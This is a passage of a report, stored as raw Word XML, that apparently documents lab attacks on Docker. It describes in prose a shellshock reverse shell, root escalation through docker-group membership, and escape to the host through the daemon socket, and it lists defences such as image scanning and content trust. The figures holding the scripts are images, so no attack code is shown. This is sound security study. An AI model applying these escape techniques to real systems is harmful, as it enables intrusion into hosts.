        <w:t>, presented in figure 68.</w:t>
      </w:r>
      <w:r w:rsidR="00ED2E65">
        <w:t xml:space="preserve"> This means that the</w:t>
      </w:r>
      <w:r w:rsidR="00687B5D">
        <w:t xml:space="preserve"> attacker can control the input and output of the victim’s container remotely</w:t>
      </w:r>
      <w:r w:rsidR="00365469">
        <w:t xml:space="preserve"> because </w:t>
      </w:r>
      <w:r w:rsidR="003F742F">
        <w:t xml:space="preserve">he gets </w:t>
      </w:r>
      <w:r w:rsidR="00F27814">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="003F742F">
        <w:t>reverse shell back</w:t>
      </w:r>
      <w:r w:rsidR="00687B5D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00FE5343">
        <w:t xml:space="preserve"> The commands used in figure 63 </w:t>
      </w:r>
      <w:r w:rsidR="00197D0E">
        <w:t xml:space="preserve">are </w:t>
      </w:r>
      <w:r w:rsidR="00966FBB">
        <w:t xml:space="preserve">presented in-detail in </w:t>
      </w:r>
      <w:r w:rsidR="00197D0E">
        <w:t xml:space="preserve">the previous </w:t>
      </w:r>
      <w:r w:rsidR="00966FBB">
        <w:t>chapter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02910484" w14:textId="1C8AEEE6" w:rsidR="00B67E4D" w:rsidRDefault="00B67E4D" w:rsidP="00B67E4D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58C277B6" wp14:editId="377761B3">
            <wp:extent cx="5581650" cy="243648"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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581650" cy="243648"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0331B69A" w14:textId="35507D9E" w:rsidR="000859E9" w:rsidRPr="00C86468" w:rsidRDefault="000859E9" w:rsidP="00C86468">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="222" w:name="_Toc86858658"/>
      <w:bookmarkStart w:id="223" w:name="_Toc86867548"/>
      <w:r w:rsidRPr="000859E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="000859E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="000859E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="000859E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>67</w:t>
      </w:r>
      <w:r w:rsidRPr="000859E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="000859E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Script to execute reverse shell.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="222"/>
      <w:bookmarkEnd w:id="223"/>
    </w:p>
    <w:p w14:paraId="2EB69496" w14:textId="77505C6B" w:rsidR="00B67E4D" w:rsidRDefault="00B67E4D" w:rsidP="00B67E4D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69FC46E9" wp14:editId="0E393BEE">
            <wp:extent cx="5340350" cy="639588"/>
            <wp:effectExtent l="0" t="0" r="0" b="825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340350" cy="639588"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F66D21" w14:textId="7817D40C" w:rsidR="006C5471" w:rsidRDefault="006C5471" w:rsidP="006C5471">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="224" w:name="_Toc86858659"/>
      <w:bookmarkStart w:id="225" w:name="_Toc86867549"/>
      <w:r w:rsidRPr="006C5471">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="006C5471">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="006C5471">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="006C5471">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>68</w:t>
      </w:r>
      <w:r w:rsidRPr="006C5471">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="006C5471">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: The Listener.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="224"/>
      <w:bookmarkEnd w:id="225"/>
    </w:p>
    <w:p w14:paraId="04792A6D" w14:textId="1EA33DA7" w:rsidR="00C86468" w:rsidRDefault="0051350D" w:rsidP="00C86468">
      <w:r>
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidR="00594F51">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F92454">
        <w:t xml:space="preserve">attacker managed to get </w:t>
      </w:r>
      <w:r w:rsidR="00A65C92">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00F92454">
        <w:t xml:space="preserve">reverse shell of the </w:t>
      </w:r>
      <w:r w:rsidR="00A65C92">
        <w:t>victim’s container due to the vulnerabilities found in the application.</w:t>
      </w:r>
      <w:r w:rsidR="00C660C3">
        <w:t xml:space="preserve"> This </w:t>
      </w:r>
      <w:r w:rsidR="00316673">
        <w:t>shows that attackers can infiltrate through vulnerable application</w:t>
      </w:r>
      <w:r w:rsidR="000C729E">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00316673">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006C1D7C">
        <w:t xml:space="preserve">to exploit other containers </w:t>
      </w:r>
      <w:r w:rsidR="00D620C0">
        <w:t>or the Docker host</w:t>
      </w:r>
      <w:r w:rsidR="0086208F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C878EC">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00C84BFD">
        <w:t>extend their attacks.</w:t>
      </w:r>
      <w:r w:rsidR="0046307A">
        <w:t xml:space="preserve"> In other words, </w:t>
      </w:r>
      <w:r w:rsidR="00A418CA">
        <w:t xml:space="preserve">vulnerable applications </w:t>
      </w:r>
      <w:r w:rsidR="004D05D2">
        <w:t xml:space="preserve">pave the way for attackers to </w:t>
      </w:r>
      <w:r w:rsidR="00406EFD">
        <w:t>penetrate</w:t>
      </w:r>
      <w:r w:rsidR="00985F26">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00994676">
        <w:t>enterprise</w:t>
      </w:r>
      <w:r w:rsidR="00657336">
        <w:t xml:space="preserve"> and individual</w:t>
      </w:r>
      <w:r w:rsidR="00994676">
        <w:t xml:space="preserve"> systems to </w:t>
      </w:r>
      <w:r w:rsidR="000D183A">
        <w:t xml:space="preserve">damage and steal useful information. In this attack, the application </w:t>
      </w:r>
      <w:r w:rsidR="00FB2471">
        <w:t xml:space="preserve">is downloaded from the </w:t>
      </w:r>
      <w:r w:rsidR="00406EFD">
        <w:t>public repository</w:t>
      </w:r>
      <w:r w:rsidR="00483656">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00406EFD">
        <w:t>Docker Hub</w:t>
      </w:r>
      <w:r w:rsidR="009F41A6">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00FA4D29">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="0075390E">
        <w:t>accessible to every Docker user</w:t>
      </w:r>
      <w:r w:rsidR="008F0509">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C66EEE">
        <w:t xml:space="preserve"> This attack </w:t>
      </w:r>
      <w:r w:rsidR="00D3597E">
        <w:t>showed that</w:t>
      </w:r>
      <w:r w:rsidR="00BF63FA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00595CA8">
        <w:t>threat actors</w:t>
      </w:r>
      <w:r w:rsidR="00BF63FA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00595CA8">
        <w:t xml:space="preserve">can </w:t>
      </w:r>
      <w:r w:rsidR="00BF63FA">
        <w:t>insert</w:t>
      </w:r>
      <w:r w:rsidR="00595CA8">
        <w:t xml:space="preserve"> malicious scripts</w:t>
      </w:r>
      <w:r w:rsidR="002A610B">
        <w:t xml:space="preserve">, including spyware, </w:t>
      </w:r>
      <w:r w:rsidR="00B53969">
        <w:t xml:space="preserve">malware, and viruses </w:t>
      </w:r>
      <w:r w:rsidR="002469DD">
        <w:t xml:space="preserve">and upload </w:t>
      </w:r>
      <w:r w:rsidR="0040369D">
        <w:t xml:space="preserve">them </w:t>
      </w:r>
      <w:r w:rsidR="002469DD">
        <w:t>to the Docker Hub</w:t>
      </w:r>
      <w:r w:rsidR="007A0124">
        <w:t>, and user</w:t>
      </w:r>
      <w:r w:rsidR="00F21FAA">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="007A0124">
        <w:t xml:space="preserve"> can download that file </w:t>
      </w:r>
      <w:r w:rsidR="00830EBB">
        <w:t>into their computer or real production environment.</w:t>
      </w:r>
      <w:r w:rsidR="00F645EF">
        <w:t xml:space="preserve"> This way, </w:t>
      </w:r>
      <w:r w:rsidR="00C6529A">
        <w:t>attackers</w:t>
      </w:r>
      <w:r w:rsidR="007B5DEA">
        <w:t xml:space="preserve"> can steal </w:t>
      </w:r>
      <w:r w:rsidR="00A977F0">
        <w:t xml:space="preserve">information and </w:t>
      </w:r>
      <w:r w:rsidR="00AE5B62">
        <w:t>spread out their attacks.</w:t>
      </w:r>
      <w:r w:rsidR="00D30AE8">
        <w:t xml:space="preserve"> However, this attack</w:t>
      </w:r>
      <w:r w:rsidR="00E60329">
        <w:t xml:space="preserve"> can also be prevented using various </w:t>
      </w:r>
      <w:r w:rsidR="00B74A4F">
        <w:t xml:space="preserve">tools and </w:t>
      </w:r>
      <w:r w:rsidR="009572CB">
        <w:t>methods.</w:t>
      </w:r>
      <w:r w:rsidR="00607447">
        <w:t xml:space="preserve"> The following lists help to reduce</w:t>
      </w:r>
      <w:r w:rsidR="00C77074">
        <w:t xml:space="preserve"> or minimise attacks that could originate </w:t>
      </w:r>
      <w:r w:rsidR="00AE7CE9">
        <w:t>from vulnerable applications</w:t>
      </w:r>
      <w:r w:rsidR="00CF2B83">
        <w:t xml:space="preserve"> running on Docker containers</w:t>
      </w:r>
      <w:r w:rsidR="00AE7CE9">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3622A81C" w14:textId="53EEE641" w:rsidR="00AE7CE9" w:rsidRDefault="00C733FB" w:rsidP="00AE7CE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Always use trusted and verified </w:t>
      </w:r>
      <w:r w:rsidR="00381126">
        <w:t>Docker images.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19116876" w14:textId="7B4F3BC3" w:rsidR="009416E4" w:rsidRDefault="00381126" w:rsidP="00AE7CE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Scan </w:t>
      </w:r>
      <w:r w:rsidR="008C356F">
        <w:t xml:space="preserve">Docker images </w:t>
      </w:r>
      <w:r w:rsidR="00DC458B">
        <w:t>using tools, such as</w:t>
      </w:r>
      <w:r w:rsidR="00410660">
        <w:t xml:space="preserve"> Clair</w:t>
      </w:r>
      <w:r w:rsidR="008403C3">
        <w:t>, No</w:t>
      </w:r>
      <w:r w:rsidR="00783826">
        <w:t xml:space="preserve">tary, </w:t>
      </w:r>
      <w:r w:rsidR="00163801">
        <w:t>Docker bench</w:t>
      </w:r>
      <w:r w:rsidR="0044597A">
        <w:t>, and many others to</w:t>
      </w:r>
      <w:r w:rsidR="003B08EE">
        <w:t xml:space="preserve"> find </w:t>
      </w:r>
      <w:r w:rsidR="009416E4">
        <w:t>malicious files</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-2054525565"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00595DD9">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00595DD9">
            <w:instrText xml:space="preserve"> CITATION BDo21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00595DD9">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> [91]</w:t>
          </w:r>
          <w:r w:rsidR="00595DD9">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="009416E4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0426BB" w14:textId="7D4E1B20" w:rsidR="00381126" w:rsidRDefault="0044597A" w:rsidP="00AE7CE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC190A">
        <w:t xml:space="preserve">Enable Docker content trust (DCT) to check and verify </w:t>
      </w:r>
      <w:r w:rsidR="008F0ABA">
        <w:t>Docker images.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38739B0E" w14:textId="1AB5882F" w:rsidR="004E2033" w:rsidRDefault="004E2033" w:rsidP="00AE7CE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use API connection with TLS and proxy to avoid </w:t>
      </w:r>
      <w:r w:rsidR="00595DD9">
        <w:t>malicious images.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41363CE1" w14:textId="637D4405" w:rsidR="00172214" w:rsidRDefault="00093277" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="226" w:name="_Toc87032944"/>
      <w:r>
        <w:t>DISCUSSIONS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="226"/>
    </w:p>
    <w:p w14:paraId="288F44EC" w14:textId="433619E3" w:rsidR="00172214" w:rsidRDefault="00324041" w:rsidP="00172214">
      <w:r>
        <w:t xml:space="preserve">This section </w:t>
      </w:r>
      <w:r w:rsidR="00FA79C0">
        <w:t xml:space="preserve">evaluates </w:t>
      </w:r>
      <w:r w:rsidR="000D2079">
        <w:t xml:space="preserve">and examines </w:t>
      </w:r>
      <w:r w:rsidR="00432F48">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="008E5B4D">
        <w:t xml:space="preserve">overall performance of </w:t>
      </w:r>
      <w:r w:rsidR="00580FF3">
        <w:t xml:space="preserve">each attack conducted on </w:t>
      </w:r>
      <w:r w:rsidR="006444FB">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00580FF3">
        <w:t>Docker environment</w:t>
      </w:r>
      <w:r w:rsidR="00666DAC">
        <w:t xml:space="preserve">. It also discusses whether </w:t>
      </w:r>
      <w:r w:rsidR="00F71AF3">
        <w:t>the aims and objectives of this project</w:t>
      </w:r>
      <w:r w:rsidR="00E15B3E">
        <w:t xml:space="preserve"> are achieved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F676939" w14:textId="7039D0CD" w:rsidR="005772C1" w:rsidRDefault="00E72384" w:rsidP="00172214">
      <w:r>
        <w:t xml:space="preserve">The primary purpose of the first attack was to </w:t>
      </w:r>
      <w:r w:rsidR="00A73E5F">
        <w:t xml:space="preserve">conduct </w:t>
      </w:r>
      <w:r w:rsidR="006444FB">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="000E6026">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A73E5F">
        <w:t xml:space="preserve">privilege escalation attack </w:t>
      </w:r>
      <w:r w:rsidR="00305B76">
        <w:t>on Docker containers.</w:t>
      </w:r>
      <w:r w:rsidR="00B553D5">
        <w:t xml:space="preserve"> The results </w:t>
      </w:r>
      <w:r w:rsidR="00D35B72">
        <w:t>showed that</w:t>
      </w:r>
      <w:r w:rsidR="007A0EAA">
        <w:t xml:space="preserve"> the attac</w:t>
      </w:r>
      <w:r w:rsidR="00C63041">
        <w:t>ker ha</w:t>
      </w:r>
      <w:r w:rsidR="006D209F">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00C63041">
        <w:t xml:space="preserve"> gained root privilege</w:t>
      </w:r>
      <w:r w:rsidR="004B158C">
        <w:t xml:space="preserve"> on the Docker host machine (Ubuntu Laptop)</w:t>
      </w:r>
      <w:r w:rsidR="004F3B94">
        <w:t xml:space="preserve"> without knowing the root password.</w:t>
      </w:r>
      <w:r w:rsidR="00082880">
        <w:t xml:space="preserve"> The attacker </w:t>
      </w:r>
      <w:r w:rsidR="00B713BB">
        <w:t xml:space="preserve">gained root privilege due to </w:t>
      </w:r>
      <w:r w:rsidR="00F05EE4">
        <w:t xml:space="preserve">becoming </w:t>
      </w:r>
      <w:r w:rsidR="000E6026">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="006D209F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F05EE4">
        <w:t xml:space="preserve">Docker group and </w:t>
      </w:r>
      <w:r w:rsidR="008C63C7">
        <w:t xml:space="preserve">running a container based on misconfigured </w:t>
      </w:r>
      <w:r w:rsidR="0084653E">
        <w:t>Docker image.</w:t>
      </w:r>
      <w:r w:rsidR="00F63C39">
        <w:t xml:space="preserve"> This </w:t>
      </w:r>
      <w:r w:rsidR="00495C77">
        <w:t xml:space="preserve">vulnerable Docker image enabled the </w:t>
      </w:r>
      <w:r w:rsidR="00D012AA">
        <w:t>attacker to escape his privilege to root.</w:t>
      </w:r>
      <w:r w:rsidR="000A5E3C">
        <w:t xml:space="preserve"> Therefore, this attack has proven to be successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750C2E86" w14:textId="2CB11B98" w:rsidR="00360200" w:rsidRDefault="00360200" w:rsidP="00172214">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="005A32D7">
        <w:t xml:space="preserve">second attack </w:t>
      </w:r>
      <w:r w:rsidR="006C23B5">
        <w:t>aimed</w:t>
      </w:r>
      <w:r w:rsidR="005A32D7">
        <w:t xml:space="preserve"> to exam</w:t>
      </w:r>
      <w:r w:rsidR="003A51EB">
        <w:t xml:space="preserve">ine </w:t>
      </w:r>
      <w:r w:rsidR="00E651F8">
        <w:t xml:space="preserve">Docker security for </w:t>
      </w:r>
      <w:r w:rsidR="006C23B5">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00E651F8">
        <w:t>container to host attack</w:t>
      </w:r>
      <w:r w:rsidR="00A37E92">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0066292F">
        <w:t xml:space="preserve"> One container was created</w:t>
      </w:r>
      <w:r w:rsidR="00640146">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="0066292F">
        <w:t>exposing port 22</w:t>
      </w:r>
      <w:r w:rsidR="00640146">
        <w:t xml:space="preserve"> to outsiders.</w:t>
      </w:r>
      <w:r w:rsidR="00D5574B">
        <w:t xml:space="preserve"> The author </w:t>
      </w:r>
      <w:r w:rsidR="004C30BE">
        <w:t>exploits th</w:t>
      </w:r>
      <w:r w:rsidR="001A6A0C">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="004C30BE">
        <w:t xml:space="preserve"> exposed port</w:t>
      </w:r>
      <w:r w:rsidR="00F958C0">
        <w:t>, gaining access to other containers</w:t>
      </w:r>
      <w:r w:rsidR="00672949">
        <w:t xml:space="preserve"> connected to the same network bridge.</w:t>
      </w:r>
      <w:r w:rsidR="001A6A0C">
        <w:t xml:space="preserve"> Further, the author abused the Docker daemon socket to </w:t>
      </w:r>
      <w:r w:rsidR="002F7804">
        <w:t xml:space="preserve">access the host’s </w:t>
      </w:r>
      <w:r w:rsidR="00861624">
        <w:t>file system</w:t>
      </w:r>
      <w:r w:rsidR="00B707F1">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003E5214">
        <w:t xml:space="preserve"> The</w:t>
      </w:r>
      <w:r w:rsidR="00623CFA">
        <w:t xml:space="preserve"> author </w:t>
      </w:r>
      <w:r w:rsidR="007A58BB">
        <w:t>escaped to the Docker host</w:t>
      </w:r>
      <w:r w:rsidR="004E7877">
        <w:t xml:space="preserve">, exploiting the exposed </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004E7877">
        <w:t>port</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004E7877">
        <w:t xml:space="preserve"> and abusing the </w:t>
      </w:r>
      <w:r w:rsidR="00D3466E">
        <w:t>daemon socket</w:t>
      </w:r>
      <w:r w:rsidR="005B3253">
        <w:t>. Thus</w:t>
      </w:r>
      <w:r w:rsidR="00835D47">
        <w:t>, the experiment of this attack was completed successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217C645F" w14:textId="2DD46B60" w:rsidR="001C17E4" w:rsidRDefault="007C3184" w:rsidP="00172214">
      <w:r>
        <w:t xml:space="preserve">The last attack </w:t>
      </w:r>
      <w:r w:rsidR="00CC4FA2">
        <w:t>was conducted to demonstrate how attackers can</w:t>
      </w:r>
      <w:r w:rsidR="000C55B2">
        <w:t xml:space="preserve"> abuse </w:t>
      </w:r>
      <w:r w:rsidR="00A72E70">
        <w:t xml:space="preserve">containers </w:t>
      </w:r>
      <w:r w:rsidR="003E4956">
        <w:t xml:space="preserve">running </w:t>
      </w:r>
      <w:r w:rsidR="00A72E70">
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r w:rsidR="00A6383E">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00A72E70">
        <w:t>vulnerable application</w:t>
      </w:r>
      <w:r w:rsidR="00F003A2">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F66A8D">
        <w:t xml:space="preserve"> The application </w:t>
      </w:r>
      <w:r w:rsidR="00606EBD">
        <w:t xml:space="preserve">was </w:t>
      </w:r>
      <w:r w:rsidR="00133BD9">
        <w:t xml:space="preserve">pulled from </w:t>
      </w:r>
      <w:r w:rsidR="00D95EF5">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00133BD9">
        <w:t xml:space="preserve">Docker Hub and was </w:t>
      </w:r>
      <w:r w:rsidR="00606EBD">
        <w:t xml:space="preserve">vulnerable to shellshock attacks, meaning </w:t>
      </w:r>
      <w:r w:rsidR="0041467A">
        <w:t>the attacker</w:t>
      </w:r>
      <w:r w:rsidR="00E85EAB">
        <w:t xml:space="preserve"> can execute reverse shell attack on the</w:t>
      </w:r>
      <w:r w:rsidR="0041467A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00755226">
        <w:t>container where</w:t>
      </w:r>
      <w:r w:rsidR="00E85EAB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00755226">
        <w:t>the application is running</w:t>
      </w:r>
      <w:r w:rsidR="00127116">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00156E6C">
        <w:t xml:space="preserve"> As a result, the author managed to </w:t>
      </w:r>
      <w:r w:rsidR="002B4CF9">
        <w:t xml:space="preserve">get </w:t>
      </w:r>
      <w:r w:rsidR="002A0C9F">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="002B4CF9">
        <w:t xml:space="preserve">shell of the container </w:t>
      </w:r>
      <w:r w:rsidR="002A0C9F">
        <w:t xml:space="preserve">because of the </w:t>
      </w:r>
      <w:r w:rsidR="00DD0213">
        <w:t>application vulnerabilities. Thus, th</w:t>
      </w:r>
      <w:r w:rsidR="00C92900">
        <w:t xml:space="preserve">e outcome of this attack was </w:t>
      </w:r>
      <w:r w:rsidR="002D0437">
        <w:t>completed with success.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4928011D" w14:textId="36E39D39" w:rsidR="00474BBC" w:rsidRDefault="00BA0048" w:rsidP="00474BBC">
      <w:pPr>
